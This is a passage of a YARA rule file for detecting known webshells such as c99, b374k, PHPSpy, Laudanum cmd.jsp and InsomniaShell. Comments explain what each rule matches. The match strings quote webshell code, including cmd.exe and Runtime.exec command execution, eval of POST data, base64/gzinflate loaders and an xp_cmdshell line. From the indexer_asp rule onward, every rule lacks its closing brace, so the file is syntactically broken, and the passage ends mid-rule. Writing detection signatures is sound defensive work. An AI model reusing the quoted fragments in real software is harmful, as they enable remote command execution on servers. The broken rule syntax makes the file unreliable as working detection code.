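        $s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
        $s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
        $s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
    condition:
        all of them
}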
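// "packet door" client (Client.exe): a trigger client for a port-knocking style
// backdoor. Matches four of its console prompts/messages; all are required.
// Closing brace restored.
rule bin_Client {
    meta:
        description = "Webshells Auto-generated - file Client.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "5f91a5b46d155cacf0cc6673a2a5461b"
    strings:
        $s0 = "Recieved respond from server!!"
        $s4 = "packet door client"
        $s5 = "input source port(whatever you want):"
        $s7 = "Packet sent,waiting for reply..."
    condition:
        all of them
}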
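// adjustcr.exe (UPX-packed CR/LF converter from a toolkit). $s0/$s2 are the standard
// UPX header strings found in every UPX-packed file; the discriminators are the
// "AdjustCR Carr" banner fragment and the registry-path fragment in $s7. All four
// are required, so UPX alone does not fire. Closing brace restored.
rule adjustcr {
    meta:
        description = "Webshells Auto-generated - file adjustcr.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "17037fa684ef4c90a25ec5674dac2eb6"
    strings:
        $s0 = "$Info: This file is packed with the UPX executable packer $"
        $s2 = "$License: NRV for UPX is distributed under special license $"
        $s6 = "AdjustCR Carr"
        $s7 = "ION\\System\\FloatingPo"
    condition:
        all of them
}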
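// CmdAsp.asp. $s2/$s9 are the script's own section comments, $s6 the cmd.exe
// invocation redirected to a temp file (the same fragment is $s3 of
// webshell_asp_cmd). All three are required. Closing brace restored.
rule ASP_CmdAsp {
    meta:
        description = "Webshells Auto-generated - file CmdAsp.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "79d4f3425f7a89befb0ef3bafe5e332f"
    strings:
        $s2 = "' -- Read the output from our command and remove the temp file -- '"
        $s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
        $s9 = "' -- create the COM objects that we will be using -- '"
    condition:
        all of them
}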
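// php-backdoor.php. $s1 is the upload handler (legacy $HTTP_POST_FILES), $s2 the
// GET-based "execute command" form using $PHP_SELF; both are required.
// Closing brace restored.
rule webshell_php_backdoor {
    meta:
        description = "Web Shell - file php-backdoor.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
    strings:
        $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
        $s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
    condition:
        all of them
}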
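// "SimShell 1.0" (Simorgh Security). $s0/$s1/$s3 are banner, stylesheet name and
// site URL; $s2 is the cd-command regex on $_REQUEST['command']. Two of four are
// required. The same sample family is also covered by WebShell_Generic_PHP_1.
// Closing brace restored.
rule SimShell_1_0___Simorgh_Security_MGZ_php {
    meta:
        description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "37cb1db26b1b0161a4bf678a6b4565bd"
    strings:
        $s0 = "Simorgh Security Magazine "
        $s1 = "Simshell.css"
        $s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
        $s3 = "www.simorgh-ev.com"
    condition:
        2 of them
}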
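// g00nshell v1.3 (PHP; hash is SHA1). Strings are the usage comment (?cmd= in the
// URL), an unsanitised SHOW COLUMNS query on $_GET['table'], the MD5 user-agent
// key used as an access gate, and the two form builders; two of five are required.
// Closing brace restored.
rule WebShell_g00nshell_v1_3 {
    meta:
        description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
        author = "Florian Roth"
        hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
    strings:
        $s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
        $s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
        $s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
        $s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
        $s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
    condition:
        2 of them
}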
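// Nshell (1).php. $s0 is the command input echo, $s1 the whoami fallback line that
// also appears (shorter) in WebShell_h4ntu_shell__powered_by_tsoi_. Either fires.
// Closing brace restored.
rule Nshell__1__php_php {
    meta:
        description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "973fc89694097a41e684b43a21b1b099"
    strings:
        $s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
        $s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
    condition:
        1 of them
}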
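// 529.php, a safe_mode/open_basedir bypass shell (hash is SHA1). Strings are the
// crew/author banners, the "This is exploit" notice, the bypass title and the
// path-walking code ($s14/$s20). Two of seven are required. Closing brace restored.
rule WebShell_php_webshells_529 {
    meta:
        description = "PHP Webshells Github Archive - file 529.php"
        author = "Florian Roth"
        hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
    strings:
        $s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
        $s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
        $s9 = "echo '<PRE><P>This is exploit from <a " fullword
        $s10 = "This Exploit Was Edited By KingDefacer" fullword
        $s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
        $s14 = "$hardstyle = explode(\"/\", $file); " fullword
        $s20 = "while($level--) chdir(\"..\"); " fullword
    condition:
        2 of them
}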
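// Super rule for thirteen JSP file-manager shells (JFolder/jfolder01, browser.jsp,
// etc.). Both strings are the shared upload-progress code (UploadMonitor lookup and
// elapsed-time computation) and both are required; this is library-style code, so
// confirm a hit is a full shell rather than a reused upload component.
// Closing brace restored.
rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
    meta:
        description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "37603e44ee6dc1c359feb68a0d566f76"
        hash1 = "a7e25b8ac605753ed0c438db93f6c498"
        hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
        hash3 = "36331f2c81bad763528d0ae00edf55be"
        hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
        hash5 = "8979594423b68489024447474d113894"
        hash6 = "ec482fc969d182e5440521c913bab9bd"
        hash7 = "f98d2b33cd777e160d1489afed96de39"
        hash8 = "4b4c12b3002fad88ca6346a873855209"
        hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
        hash10 = "e9a5280f77537e23da2545306f6a19ad"
        hash11 = "598eef7544935cf2139d1eada4375bb5"
        hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
    strings:
        $s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
        $s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
    condition:
        all of them
}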
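// b374k 2.2 PHP shell (hash is SHA1). $s0/$s6/$s9 are the shell's own header
// comments; $s8 is a plain asterisk banner and $s10 the eval(gzinflate(base64_decode
// loader idiom, both of which occur in other obfuscated PHP. Three of five are
// required, so at least one b374k-specific comment must be present. Closing brace restored.
rule WebShell_b374k_php {
    meta:
        description = "PHP Webshells Github Archive - file b374k.php.php"
        author = "Florian Roth"
        hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
    strings:
        $s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
        $s6 = "// password (default is: b374k)"
        $s8 = "//******************************************************************************"
        $s9 = "// b374k 2.2" fullword
        $s10 = "eval(\"?>\".gzinflate(base64_decode("
    condition:
        3 of them
}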
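// PHPJackal v1.5. Both strings are table headers of its UI ("MySQL cilent" — the
// typo is in the sample — and "Wordlist generator"); both are required. The wider
// family is covered by webshell_itsec_PHPJackal_itsecteam_shell_jHn. Closing brace restored.
rule webshell_PHPJackal_v1_5 {
    meta:
        description = "Web Shell - file PHPJackal v1.5.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "d76dc20a4017191216a0315b7286056f"
    strings:
        $s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
        $s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
    condition:
        all of them
}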
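// Super rule for PHPSpy 2005 (full/lite) and PHPSPY.php. Strings are the command
// input, the upload copy() line and the exec-function <option> selector; two of
// three are required. Closing brace restored.
rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
    meta:
        description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
        hash1 = "42f211cec8032eb0881e87ebdb3d7224"
        hash2 = "0712e3dc262b4e1f98ed25760b206836"
    strings:
        $s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
        $s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
        $s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
    condition:
        2 of them
}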
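// TBack.dll. Single-string rule on an embedded build path ("\final\new\lcc\public.dll");
// it identifies this build's artefact rather than behaviour. Closing brace restored.
rule Unpack_TBack {
    meta:
        description = "Webshells Auto-generated - file TBack.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "a9d1007823bf96fb163ab38726b48464"
    strings:
        $s5 = "\\final\\new\\lcc\\public.dll"
    condition:
        all of them
}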
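// phpshell.php. Strings are the "newfile" editor input, the icon <img> builder using
// $REMOTE_IMAGE_URL and a nested str_replace path normaliser; all three are required.
// Closing brace restored.
rule phpshell {
    meta:
        description = "Webshells Auto-generated - file phpshell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "1dccb1ea9f24ffbd085571c88585517b"
    strings:
        $s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
        $s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
        $s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
    condition:
        all of them
}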
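// pentestmonkey findsock.c / php-findsock-shell.php / php-reverse-shell.php (hashes
// are SHA1). The only string is the author contact comment, so the rule flags
// provenance, not behaviour: any file carrying that comment — including the openly
// published originals — matches. Useful as a triage signal; confirm by content.
// Closing brace restored.
rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
    meta:
        description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
        hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
        hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
    strings:
        $s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
    condition:
        all of them
}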
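// "Ayyildiz Tim (AYT) Shell v2.1" (HTML/PHP). $s0/$s1/$s3 are group name, author
// tag and an image URL; $s2 is a code comment from the working-directory handler.
// Two of four are required, so the group name alone does not fire. Closing brace restored.
rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
    meta:
        description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
    strings:
        $s0 = "Ayyildiz"
        $s1 = "TouCh By iJOo"
        $s2 = "First we check if there has been asked for a working directory"
        $s3 = "http://ayyildiz.org/images/whosonline2.gif"
    condition:
        2 of them
}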
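// tool.asp (ASP file browser). Strings are Response.Write'd HTML: the self-posting
// form using Request.ServerVariables("URL"), the <DIR> row and a javascript: link
// builder. Two of three are required. Closing brace restored.
rule webshell_ASP_tool {
    meta:
        description = "Web Shell - file tool.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "4ab68d38527d5834e9c1ff64407b34fb"
    strings:
        $s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
        $s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
        $s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
    condition:
        2 of them
}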
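// webadmin.php. Single-string rule on the "editfilename" input of its file editor,
// as emitted through $this->inpu...; narrow but specific. Closing brace restored.
rule webadmin {
    meta:
        description = "Webshells Auto-generated - file webadmin.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "3a90de401b30e5b590362ba2dde30937"
    strings:
        $s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
    condition:
        all of them
}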
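// php-include-w-shell.php. $s0 is the DB-credential link builder, $s1 the guard that
// enables the "phpshell" reverse connection when app/host/port are set. Either fires.
// Closing brace restored.
rule php_include_w_shell_php {
    meta:
        description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "4e913f159e33867be729631a7ca46850"
    strings:
        $s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
        $s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
    condition:
        1 of them
}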
rule indexer_asp {
   	// indexer.asp (Turkish-language UI): a form field fragment and the tail of
   	// a Microsoft Script Encoder block ("...==^#~@" is the encoder's closing
   	// marker) followed by a submit input. Either string triggers.
   	meta:
   		description = "Semi-Auto-generated  - file indexer.asp.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "9ea82afb8c7070817d4cdf686abe0300"
   	strings:
   		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
   		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
   	condition:
   		1 of them
rule FSO_s_remview {
   	// remview.php: PHP echo statements with a long literal "\n" run and a
   	// nested str_replace quoting helper. $s2 and $s4 are the same prefix
   	// (the second just one character longer), so effectively two distinct
   	// fragments are checked; all must be present.
   	meta:
   		description = "Webshells Auto-generated - file remview.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "b4a09911a5b23e00b55abe546ded691c"
   	strings:
   		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
   		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
   		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
   	condition:
   		all of them
rule webshell_aZRaiLPhp_v1_0 {
   	// aZRaiLPhp v1.0: PHP source printing a CHMOD value derived from
   	// fileperms() and a self-referencing edit link (op=efp&fname=...).
   	// Both fragments are required.
   	meta:
   		description = "Web Shell - file aZRaiLPhp v1.0.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "26b2d3943395682e36da06ed493a3715"
   	strings:
   		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
   		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
   	condition:
   		all of them
rule PHP_Shell_v1_7 {
   	// PHP_Shell v1.7: keyed on the unedited template <title> (placeholders
   	// and the sample's own misspellings left in). Single string, no fallback.
   	meta:
   		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "b5978501c7112584532b4ca6fb77cba5"
   	strings:
   		$a8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]" ascii
   	condition:
   		all of ($a*)
rule webshell_WinX_Shell {
   	// WinX Shell.php: two print statements sharing the same Verdana/#990000
   	// font markup, one labelled "Filenam...", one "File: ". Both required.
   	meta:
   		description = "Web Shell - file WinX Shell.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "17ab5086aef89d4951fe9b7c7a561dda"
   	strings:
   		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
   		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
   	condition:
   		all of them
rule warfiles_cmd : webshell {
   	// Laudanum cmd.jsp: exec() of the "cmd" request parameter, the echo of
   	// the command, the GET form and the readLine() loop over the output.
   	// All four strings plus a 2KB size cap, which fits this minimal JSP but
   	// will miss a copy that has been padded or embedded in a larger page.
   	meta:
   		description = "Laudanum Injector Tools - file cmd.jsp"
   		author = "Florian Roth"
   		reference = "http://laudanum.inguardians.com/"
   		date = "2015-06-22"
   		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
   	strings:
   		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii /* PEStudio Blacklist: strings */
   		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii /* PEStudio Blacklist: strings */
   		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
   		$s4 = "String disr = dis.readLine();" fullword ascii
   	condition:
   		filesize < 2KB and all of them
rule ngh_php_php {
   	// ngh.php "NGH edition" shell (author handle Cr4sh_aka_RKL): Perl
   	// connect-back comment, bindshell form action and the start of the
   	// base64 GIF logo. Any single string triggers, so the short $a1
   	// ("NGH edition") carries the same weight as the specific code fragments.
   	meta:
   		description = "Semi-Auto-generated  - file ngh.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
   	strings:
   		$a0 = "Cr4sh_aka_RKL" ascii
   		$a1 = "NGH edition" ascii
   		$a2 = "/* connectback-backdoor on perl" ascii
   		$a3 = "<form action=<?=$script?>?act=bindshell method=POST>" ascii
   		$a4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r" ascii
   	condition:
   		any of ($a*)
rule webshell_jsp_jdbc {
   	// jdbc.jsp: the charset selection line that reads request parameter "z0"
   	// and defaults to "gbk". Single string, no fallback.
   	meta:
   		description = "Web Shell - file jdbc.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
   	strings:
   		$a4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" ascii
   	condition:
   		all of ($a*)
rule asp_file : webshell {
   	// Laudanum file.asp (author credit, BinaryWrite download, REMOTE_ADDR
   	// echo, web-root link, FileSystemObject folder/file access).
   	// uint16(0) == 0x253c: the file starts with the bytes 3C 25 ("<%"),
   	// read little-endian. Five of six strings under 30KB.
   	meta:
   		description = "Laudanum Injector Tools - file file.asp"
   		author = "Florian Roth"
   		reference = "http://laudanum.inguardians.com/"
   		date = "2015-06-22"
   		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
   	strings:
   		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
   		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
   		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii /* PEStudio Blacklist: strings */
   		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii /* PEStudio Blacklist: strings */
   		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
   		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
   	condition:
   		uint16(0) == 0x253c and filesize < 30KB and 5 of them
rule WebShell_c99_madnet {
   	// c99_madnet.php: the credential-stub comments ($login/$pass/$md5_pass
   	// with their inline "//" notes) and the eval(gzinflate(base64_decode('
   	// unpacking stub that follows them. All five strings are required;
   	// webshell_c99_madnet_smowu covers the same stub with looser fragments.
   	meta:
   		description = "PHP Webshells Github Archive - file c99_madnet.php"
   		author = "Florian Roth"
   		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
   	strings:
   		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
   		$s1 = "eval(gzinflate(base64_decode('"
   		$s2 = "$pass = \"pass\";  //Pass" fullword
   		$s3 = "$login = \"user\"; //Login" fullword
   		$s4 = "             //Authentication" fullword
   	condition:
   		all of them
rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
   	// Super rule over ten c99-family variants: hexdump view, the
   	// $filestealth stat() toggle, MySQL browsing/creation code, the
   	// server-status page and the encoder textarea. Any two fragments match,
   	// which is loose enough to catch mods of the family but also any file
   	// that copies two of these c99 code lines.
   	meta:
   		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		super_rule = 1
   		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
   		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
   		hash2 = "9c34adbc8fd8d908cbb341734830f971"
   		hash3 = "f2fa878de03732fbf5c86d656467ff50"
   		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
   		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
   		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
   		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
   		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
   		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
   	strings:
   		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
   		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
   		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
   		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
   		$s8 = "echo \"<center><b>Server-status variables:</b><br>\";" fullword
   		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
   	condition:
   		2 of them
rule shelltools_g0t_root_xwhois {
   	// Auto-generated from the xwhois.exe binary: four short fragments that
   	// are meaningless on their own (e.g. "Diamond"), so detection rests
   	// entirely on all four co-occurring in one file.
   	meta:
   		description = "Webshells Auto-generated - file xwhois.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "0bc98bd576c80d921a3460f8be8816b4"
   	strings:
   		$a1 = "rting! " ascii
   		$a2 = "aTypCog(" ascii
   		$a5 = "Diamond" ascii
   		$a6 = "r)r=rQreryr" ascii
   	condition:
   		all of ($a*)
rule HYTop_DevPack_2005 {
   	// HYTop DevPack 2005.asp: the encodeForUrl(...server.mapPath("/")...)
   	// path-relativising line plus two scrollbar CSS colours. The CSS lines
   	// are generic by themselves; the rule only holds because all three are
   	// required.
   	meta:
   		description = "Webshells Auto-generated - file 2005.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
   	strings:
   		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
   		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
   		$s9 = "scrollbar-face-color:#E4E4F3;"
   	condition:
   		all of them
rule webshell_c99_madnet_smowu {
   	// smowu.php, a c99_madnet-style wrapper: the same credential-stub
   	// comments as WebShell_c99_madnet but without the literal user/pass
   	// values, plus the eval(gzinflate(base64_decode(' unpacking stub.
   	// All six fragments required.
   	meta:
   		description = "Web Shell - file smowu.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "3aaa8cad47055ba53190020311b0fb83"
   	strings:
   		$s0 = "//Authentication" fullword
   		$s1 = "$login = \"" fullword
   		$s2 = "eval(gzinflate(base64_decode('"
   		$s4 = "//Pass"
   		$s5 = "$md5_pass = \""
   		$s6 = "//If no pass then hash"
   	condition:
   		all of them
rule webshell_PHP_G5 {
   	// G5.php: keyed on the "Hacking Mode?" <select> the shell prints.
   	// Single string, no fallback.
   	meta:
   		description = "Web Shell - file G5.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "95b4a56140a650c74ed2ec36f08d757f"
   	strings:
   		$a3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op" ascii
   	condition:
   		all of ($a*)
rule webshell_php_dodo_zip {
   	// zip.php: hand-rolled ZIP writer. $s0 builds a DOS time as \x escapes,
   	// $s3 is the PHP literal of a ZIP local-file-header ("\x50\x4b\x03\x04"
   	// is "PK\x03\x04"). Both required. A legitimate pure-PHP zip library
   	// could contain near-identical code; the sample file name is the only tie
   	// to a shell.
   	meta:
   		description = "Web Shell - file zip.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "b7800364374077ce8864796240162ad5"
   	strings:
   		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
   		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
   	condition:
   		all of them
rule Webshell_Insomnia {
   	// InsomniaShell.aspx (ASP.NET reverse/bind shell): named-pipe error
   	// text, command echo, an xp_cmdshell line writing to a 127.0.0.1 UNC
   	// path, token/SID dumping and the Advapi32 P/Invoke declaration.
   	// Three of eight strings; the P/Invoke ($s5) and SECURITY_ATTRIBUTES
   	// ($s4) lines also occur in benign C# and should not be relied on alone.
   	meta:
   		description = "Insomnia Webshell - file InsomniaShell.aspx"
   		author = "Florian Roth"
   		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
   		date = "2014/12/09"
   		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
   		score = 80
   	strings:
   		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
   		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
   		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
   		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
   		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
   		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
   		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
   		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
   	condition:
   		3 of them
rule FSO_s_EFSO_2_2 {
   	// EFSO_2.asp: two fragments of the Script-Encoded body (the "@#@&"
   	// sequences are encoder output). Both required, so only this exact
   	// encoding matches. Note webshell_asp_EFSO_2 targets the same sample
   	// hash with a different encoded fragment - two rules, one file.
   	meta:
   		description = "Webshells Auto-generated - file EFSO_2.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "a341270f9ebd01320a7490c12cb2e64c"
   	strings:
   		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
   		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
   	condition:
   		all of them
rule WebShell_Generic_PHP_6 {
   	// Super rule over five PHP shells sharing an execute($com) helper:
   	// eval of POST 'phpcode', shell_exec/system echo, the "winda" OS branch.
   	// Four of six fragments. hash1..hash4 are the same files as
   	// WebShell_Generic_PHP_2's hash0..hash3, so both rules fire on them.
   	meta:
   		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
   		author = "Florian Roth"
   		super_rule = 1
   		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
   		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
   		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
   		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
   		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
   	strings:
   		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
   		$s5 = "echo shell_exec($com);" fullword
